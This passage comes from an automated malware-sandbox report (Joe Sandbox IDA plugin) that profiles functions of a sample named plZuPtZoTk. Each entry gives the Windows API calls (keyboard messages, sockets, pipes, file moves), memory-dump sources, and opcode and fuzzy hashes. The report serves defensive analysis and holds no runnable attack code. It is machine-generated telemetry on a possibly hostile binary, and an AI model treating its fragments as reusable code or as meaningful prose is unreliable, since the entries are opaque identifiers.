                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00A2ADD8
                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00A2AE17
                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00A2AE38
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: 6b98179ae4b024ef44651cf7cb5ea11082e24ce4a4356f252c6524d35f830019
                                                                      • Instruction ID: c9cac96c878e4a76778ea29ffa22ca1acbbe313ede37835ab13344d64ea2f11c
                                                                      • Opcode Fuzzy Hash: 6b98179ae4b024ef44651cf7cb5ea11082e24ce4a4356f252c6524d35f830019
                                                                      • Instruction Fuzzy Hash: 4D5106A16047F13FFB3683389C55BBABEA96B55300F0884A8E1D5568C3D294EC85D762
                                                                      Function 009F542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetConsoleCP.KERNEL32(00A03CD6,?,?,?,?,?,?,?,?,009F5BA3,?,?,00A03CD6,?,?), ref: 009F5470
                                                                      • __fassign.LIBCMT ref: 009F54EB
                                                                      • __fassign.LIBCMT ref: 009F5506
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00A03CD6,00000005,00000000,00000000), ref: 009F552C
                                                                      • WriteFile.KERNEL32(?,00A03CD6,00000000,009F5BA3,00000000,?,?,?,?,?,?,?,?,?,009F5BA3,?), ref: 009F554B
                                                                      • WriteFile.KERNEL32(?,?,00000001,009F5BA3,00000000,?,?,?,?,?,?,?,?,?,009F5BA3,?), ref: 009F5584
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                      • String ID:
                                                                      • API String ID: 1324828854-0
                                                                      • Opcode ID: 27cc4e38359b5fa17095d415452ea3615f7c01c22fb26d520bdd3e6f0a08f2b7
                                                                      • Instruction ID: 1165453c6e6a8b04f742a526fcc032ce816941365ea38b1788c12ee9d9209cc5
                                                                      • Opcode Fuzzy Hash: 27cc4e38359b5fa17095d415452ea3615f7c01c22fb26d520bdd3e6f0a08f2b7
                                                                      • Instruction Fuzzy Hash: EA51C071A00749AFDB10CFA8D885AEEBBF9FF09310F15451AFA55E7291D7309A41CB60
                                                                      Function 009E2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _ValidateLocalCookies.LIBCMT ref: 009E2D4B
                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 009E2D53
                                                                      • _ValidateLocalCookies.LIBCMT ref: 009E2DE1
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 009E2E0C
                                                                      • _ValidateLocalCookies.LIBCMT ref: 009E2E61
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 1170836740-1018135373
                                                                      • Opcode ID: d2f50e24c62c868baccc0f652450a4ae48dc5f8792a6c7eb2e548caf9c7b064e
                                                                      • Instruction ID: 970970c67ef3ccbec44202e6ef53f88c4a35f5e35629603493f2e5fa15bd1b18
                                                                      • Opcode Fuzzy Hash: d2f50e24c62c868baccc0f652450a4ae48dc5f8792a6c7eb2e548caf9c7b064e
                                                                      • Instruction Fuzzy Hash: 8E41B234E00289EBCF11DF6ACC45B9EBBB9BF84324F148155E914AB392D771AE41CB90
                                                                      Function 00A410B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00A4304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A4307A
                                                                        • Part of subcall function 00A4304E: _wcslen.LIBCMT ref: 00A4309B
                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A41112
                                                                      • WSAGetLastError.WSOCK32 ref: 00A41121
                                                                      • WSAGetLastError.WSOCK32 ref: 00A411C9
                                                                      • closesocket.WSOCK32(00000000), ref: 00A411F9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 2675159561-0
                                                                      • Opcode ID: 9c8b10a81f44f0b4c6e0d824a60ccad193b921c8921aef0510b07a6850be8f4c
                                                                      • Instruction ID: 6847f8b71a16599638dc736ec40ad5bd733c7fcaecaf0a113f4f0cb68d11682d
                                                                      • Opcode Fuzzy Hash: 9c8b10a81f44f0b4c6e0d824a60ccad193b921c8921aef0510b07a6850be8f4c
                                                                      • Instruction Fuzzy Hash: 2341F435600204AFDB10DF68C884BA9BBE9FF85325F14815DF9099B295D770AE82CBE1
                                                                      Function 00A2CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00A2DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A2CF22,?), ref: 00A2DDFD
                                                                        • Part of subcall function 00A2DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A2CF22,?), ref: 00A2DE16
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00A2CF45
                                                                      • MoveFileW.KERNEL32(?,?), ref: 00A2CF7F
                                                                      • _wcslen.LIBCMT ref: 00A2D005
                                                                      • _wcslen.LIBCMT ref: 00A2D01B
                                                                      • SHFileOperationW.SHELL32(?), ref: 00A2D061
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                      • String ID: \*.*
                                                                      • API String ID: 3164238972-1173974218
                                                                      • Opcode ID: 7bef85835a6dd015f1084187c52cc714bc4e5e69a9834caaff60efdcfde10e3d
                                                                      • Instruction ID: c7e9f68f40f12babb2a1102471f1beb4aa79e289e2ee3c54618a87f552034010
                                                                      • Opcode Fuzzy Hash: 7bef85835a6dd015f1084187c52cc714bc4e5e69a9834caaff60efdcfde10e3d
                                                                      • Instruction Fuzzy Hash: 8F4176718452285FDF12EBA8DA81FDDB7B9AF48790F1000F6E545EB142EA34AA84CB50
                                                                      Function 00A52DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A52E1C
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00A52E4F
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00A52E84
                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00A52EB6
                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00A52EE0
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00A52EF1
                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00A52F0B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: LongWindow$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 2178440468-0
                                                                      • Opcode ID: 2c702d6fe918643b6a3269f21077f74e94b654190e34b2311dd05968b298df45
                                                                      • Instruction ID: 022aee297edbf8752b1bfccf3c4e5d046e8119f14b3c94e37770a63fe68a537d
                                                                      • Opcode Fuzzy Hash: 2c702d6fe918643b6a3269f21077f74e94b654190e34b2311dd05968b298df45
                                                                      • Instruction Fuzzy Hash: DC310330644251AFEB21CF98EC86F653BE1FB9A722F150165FD008F2B6CB75A849DB41
                                                                      Function 00A27726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A27769
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A2778F
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00A27792
                                                                      • SysAllocString.OLEAUT32(?), ref: 00A277B0
                                                                      • SysFreeString.OLEAUT32(?), ref: 00A277B9
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00A277DE
                                                                      • SysAllocString.OLEAUT32(?), ref: 00A277EC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      • Opcode ID: 5289f799032e7c030eaa0777cc4699c3cfb104a8ba4e73efd28b5865409ea920
                                                                      • Instruction ID: b75a0df1b386a1887ac290eedd5bf38d8a4f42522bf1a9488e88ec1b33e6c0df
                                                                      • Opcode Fuzzy Hash: 5289f799032e7c030eaa0777cc4699c3cfb104a8ba4e73efd28b5865409ea920
                                                                      • Instruction Fuzzy Hash: 51217C76604229AFDB10DFACDC88DBE77ACFB09764B048135FA15DB254D6709E428760
                                                                      Function 00A277FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A27842
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A27868
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00A2786B
                                                                      • SysAllocString.OLEAUT32 ref: 00A2788C
                                                                      • SysFreeString.OLEAUT32 ref: 00A27895
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00A278AF
                                                                      • SysAllocString.OLEAUT32(?), ref: 00A278BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      • Opcode ID: 595b7e2b10500bffae6ef04b5cae8d28095c93b36ed6df5d6e547a041cde7507
                                                                      • Instruction ID: d3ca7766327b0fa63df4cbc0246ed0bc053be1d41cafea352c68b917eca0ded8
                                                                      • Opcode Fuzzy Hash: 595b7e2b10500bffae6ef04b5cae8d28095c93b36ed6df5d6e547a041cde7507
                                                                      • Instruction Fuzzy Hash: 49215E36608224AFDB109BEDEC8DDAA77ECFB097607108125F915CB2A5E670DD81CB64
                                                                      Function 00A304D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00A304F2
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A3052E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandlePipe
                                                                      • String ID: nul
                                                                      • API String ID: 1424370930-2873401336
                                                                      • Opcode ID: 123897e87d29d431a23bd6fe19828c88b508a2fd87200a026670faf0c349e4ad
                                                                      • Instruction ID: 2e9258b09b9b833c2252c235592fdd770ab74d9d8f61913b1755b0fb43d7443f
                                                                      • Opcode Fuzzy Hash: 123897e87d29d431a23bd6fe19828c88b508a2fd87200a026670faf0c349e4ad
                                                                      • Instruction Fuzzy Hash: F8214A75600305AFDF209F69DC54E9ABBB4BF54765F208A19F8A1E72E0E7709981CF20
                                                                      Function 00A305A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00A305C6
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A30601
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandlePipe
                                                                      • String ID: nul
                                                                      • API String ID: 1424370930-2873401336
                                                                      • Opcode ID: ac7d1fcb6bf9b314e771ee6ead18e6aecf290ae94e87e29dd8d0746e3d758f9a
                                                                      • Instruction ID: 0e8a2674fd9c68ef4db527165c30455cab90c9284f544f534035fe98b7cfa226
                                                                      • Opcode Fuzzy Hash: ac7d1fcb6bf9b314e771ee6ead18e6aecf290ae94e87e29dd8d0746e3d758f9a
                                                                      • Instruction Fuzzy Hash: 452181755003059FDB209F69DC15E9ABBE8BF95B30F200A19F8A1E72E8D7B09861CB10
                                                                      Function 00A540AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009C604C
                                                                        • Part of subcall function 009C600E: GetStockObject.GDI32(00000011), ref: 009C6060
                                                                        • Part of subcall function 009C600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 009C606A
                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A54112
                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A5411F
                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A5412A
                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A54139
                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A54145
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                      • String ID: Msctls_Progress32
                                                                      • API String ID: 1025951953-3636473452
                                                                      • Opcode ID: de764536c061e533d0c05dd3ee33c48d84c36d1e1f4e9dc3ce1616e2502e03e2
                                                                      • Instruction ID: 89b39b4bf5b3551c8ba924adc1e950b4fc76b627e6c909fe5b33cd1adc8ae567
                                                                      • Opcode Fuzzy Hash: de764536c061e533d0c05dd3ee33c48d84c36d1e1f4e9dc3ce1616e2502e03e2
                                                                      • Instruction Fuzzy Hash: 3511B6B11402197EEF119F64CC85EE77F5DFF18798F104111BA18A2050C776DC61DBA4
                                                                      Function 009FD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009FD7A3: _free.LIBCMT ref: 009FD7CC
                                                                      • _free.LIBCMT ref: 009FD82D
                                                                        • Part of subcall function 009F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000), ref: 009F29DE
                                                                        • Part of subcall function 009F29C8: GetLastError.KERNEL32(00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000,00000000), ref: 009F29F0
                                                                      • _free.LIBCMT ref: 009FD838
                                                                      • _free.LIBCMT ref: 009FD843
                                                                      • _free.LIBCMT ref: 009FD897
                                                                      • _free.LIBCMT ref: 009FD8A2
                                                                      • _free.LIBCMT ref: 009FD8AD
                                                                      • _free.LIBCMT ref: 009FD8B8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                      • Instruction ID: 44caa126003322478b66d817fd61cf4af55d29d2f87bc6801ffe68ce9552bbc2
                                                                      • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                      • Instruction Fuzzy Hash: 481151B1582B0CAAE521BFB0CC47FEB7BDD6F80710F400825B399AA0A2DA65B5454750
                                                                      Function 00A2DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00A2DA74
                                                                      • LoadStringW.USER32(00000000), ref: 00A2DA7B
                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00A2DA91
                                                                      • LoadStringW.USER32(00000000), ref: 00A2DA98
                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A2DADC
                                                                      Strings
                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00A2DAB9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Message
                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                      • API String ID: 4072794657-3128320259
                                                                      • Opcode ID: bc1ab289d7b1bc2e760a59bea3f90ad90e1393de7d9b94d461687d636ba9a6f7
                                                                      • Instruction ID: 3eff78d89a8140595d94ab53e94f4b4a901b3b26c7b2858fb1480e1e4077c83b
                                                                      • Opcode Fuzzy Hash: bc1ab289d7b1bc2e760a59bea3f90ad90e1393de7d9b94d461687d636ba9a6f7
                                                                      • Instruction Fuzzy Hash: 3F0162F25003187FE710EBE49D89EEB326CF708716F4045A1B706E2046EA749E858F74
                                                                      Function 00A3096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(0165E690,0165E690), ref: 00A3097B
                                                                      • EnterCriticalSection.KERNEL32(0165E670,00000000), ref: 00A3098D
                                                                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 00A3099B
                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00A309A9
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A309B8
                                                                      • InterlockedExchange.KERNEL32(0165E690,000001F6), ref: 00A309C8
                                                                      • LeaveCriticalSection.KERNEL32(0165E670), ref: 00A309CF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                      • String ID:
                                                                      • API String ID: 3495660284-0
